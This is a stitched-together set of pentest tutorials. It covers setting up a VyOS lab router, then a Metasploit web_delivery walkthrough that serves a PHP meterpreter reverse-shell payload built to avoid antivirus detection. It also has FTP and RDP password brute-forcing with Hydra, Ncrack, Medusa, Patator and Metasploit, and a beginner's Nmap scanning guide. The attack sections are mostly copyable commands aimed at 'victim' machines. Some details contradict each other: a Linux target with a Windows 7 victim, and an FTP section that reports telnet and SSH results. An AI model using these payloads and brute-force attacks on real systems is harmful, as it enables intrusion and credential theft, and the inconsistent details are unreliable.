How to Setup VyOS (Virtual Router Pentest Lab)

VyOS is a Linux-based network operating system that provides software-based network routing, firewall, and VPN functionality.  Its configuration syntax and command-line interface are loosely derived from Juniper JUNOS as modeled by the XORP project.

First Download Vyos iso image from here

Open VMWARE tool, create a new virtual machine. Select Installer disc image file and select OS image of vyos and click on next.

Enter your virtual machine name and location. Click next.

Set Ram upto 1 GB for vyos and click to network adapter

Next we are choosing our first network adapter. Connect it to the Bridge Adapter and click on close.

Then click on finish.

Now installation process will start automatically. It takes a few seconds for the VM to boot and VyOS to load.

After boot screen hit enter and login to vyos using following credentials:

Username : vyos

Password : vyos

Installation of Vyos on local disk. In order to do that simply execute command: install image and press enter

Now type yes and press enter in next option Select auto partition press enter

In next option type yes to continue press enter

After the installation is complete Issue the reboot command Again type: yes press enter

Login again to vyos and we will start with setting

Now we will check network interfaces using show interfaces command

Now Enter configuration mode by typing “conf” and have a look at the current interfaces:

After you made some changes, you need to enter the “commit” and “save” commands.

Now we will setup network interfaces:

set interfaces ethernet eth0 address dhcp

Now again you need to enter the “commit” and “save” commands. Now we will check network interfaces using run show interfaces command.

Now before we are able to connect to our router with SSH, we will enable SSH In order to do it execute following commands:

 set service ssh Commit and save.

Now before we are able to connect to our router with TELNET, we need to enable that. To do so, issue the following commands

set service telnet Commit and save

To check all enable service type the following command

Show service

Hack Remote Linux PC using PHP File

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Linux

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

6 Ways to Hack FTP Login Password

In this article, we will learn how to gain control over our victim's PC through SSH Port. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

xHydra

This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select FTP in box against Protocol option and give the port number 21 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

Patator

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as FTP, HTTP, SMB and etc.

patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt 

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.

Metasploit

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

 Now type use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)

msf exploit (ftp_login)>set user_file  /root/Desktop/user.txt

msf exploit (ftp_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

From given below image you can observe that we had successfully grabbed the FTP username and password.

2 Ways to Hack Remote Desktop Password using kali Linux

Remote Desktop run on port 3389 so in order to discover information regarding the RDP we need to execute the following script:

Nmap –sV 192.168.0.100

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.0.100

Protocol: rdp

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your Passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hydra

Open kali linux terminal Run the following command

 hydra -l raj -P /root/Desktop/pass.txt 192.168.0.100 rdp

·         -l indicates a single username (use -L for a username list)

·         -P indicates use the following password list

·         ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

To connect to victim using remote desktop, we can use rdesktop program 

rdesktop -u -p  

Network Scanning using NMAP (Beginner Guide)

Basic Scanning Techniques

So here I will show the basic techniques for scanning network/host. But before that, you should know some basic stuff regarding Nmap status after scanning.

Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this.

·         Open: This indicates that an application is listening for connections on this port.

·         Closed: This indicates that the probes were received but there is no application listening on this port.

·         Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.

·         Unfiltered: This indicates that the probes were received but a state could not be established.

·         Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.

·         Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open kali linux terminal and type nmap to serach all nmap commands

Find All Connected PC (Ping Scan)

The -Sp option for a ping only scan. It will be more useful when you have a group of IP addresses and you don’t know which one is reachable.

nmap -sP -T4 192.168.0.1/24

Note:

-T : Used to change speed of scan. Slow scan yields Better results

Multiple IP Scan

nmap -sn 192.168.0.1/24

TCP Ports Scan

TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports in Remote PC.

Sinlge IP Scan

nmap -sT 192.168.0.102

Multiple IP Scan

nmap -sT 192.168.0.1/24

Detect Service Version

In this scan you can find the version of the service that is running on each open port. This is done using multiple techniques like banner grabbing, reading server headers and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102

Multiple Hosts Scanning

nmap -sV -T4 192.168.0.1/24

Detect Operating System

In this scan you can find the Installed Operating System in the Network PC.

Single Host Scanning

nmap -O 192.168.0.102

Multiple Hosts Scanning

nmap -O -T4 192.168.0.1/24

Detect Protocol

In this scan you can find the PROTOCOL, STATE, SERVICE in the Network PC.

nmap -sO -T4 192.168.0.1/24

Aggressive Scan (Also Work for Trace route)

For Single Host

The aggressive scan selects most commonly used options  it is simple alternative to writing long strings. It will also work for traceroute, etc.

nmap -A 192.168.0.102

Multiple Hosts Scanning

nmap -A -T4 192.168.0.1/24

UDP Ping Scan

The UDP scan only on udp ping scans on the target. . It will show you all open UDP ports in Remote PC.

nmap -sU -T4 192.168.0.102

Syn Scan

Complete 2 step in 3 way handshake. No chance of closing or crashing target. Undetected by older System. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap –sS 192.168.0.113